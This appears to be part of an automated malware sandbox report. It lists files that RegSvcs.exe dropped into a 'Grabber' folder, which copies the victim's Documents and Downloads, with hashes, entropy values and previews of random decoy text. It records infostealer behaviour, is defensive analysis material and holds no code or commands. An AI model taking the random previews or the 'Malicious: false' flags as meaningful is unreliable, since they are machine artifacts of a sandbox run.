Preview:	SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\UNKRLCVOHV.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\UNKRLCVOHV.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\UNKRLCVOHV\AQRFEVRTGL.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\UNKRLCVOHV\LIJDSFKJZG.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\UNKRLCVOHV\SNIPGPPREP.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701796197804446
Encrypted:	false
SSDEEP:	24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
MD5:	C8350CE91F4E8E8B04269B5F3C6148DA
SHA1:	22D523A327EBAF8616488087E2DCE9DBD857F0CC
SHA-256:	1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
SHA-512:	C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
Malicious:	false
Preview:	SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\UNKRLCVOHV\UNKRLCVOHV.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\UNKRLCVOHV\WSHEJMDVQC.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694142261581685
Encrypted:	false
SSDEEP:	24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
MD5:	E9AA17F314E072EBB015265FB63E77C0
SHA1:	1233B76350B8181FFFC438B62002C02B4AE79000
SHA-256:	F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
SHA-512:	719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
Malicious:	false
Preview:	WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\WSHEJMDVQC.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694142261581685
Encrypted:	false
SSDEEP:	24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
MD5:	E9AA17F314E072EBB015265FB63E77C0
SHA1:	1233B76350B8181FFFC438B62002C02B4AE79000
SHA-256:	F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
SHA-512:	719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
Malicious:	false
Preview:	WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	402
Entropy (8bit):	3.493087299556618
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
MD5:	ECF88F261853FE08D58E2E903220DA14
SHA1:	F72807A9E081906654AE196605E681D5938A2E6C
SHA-256:	CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
SHA-512:	82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\AQRFEVRTGL.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHX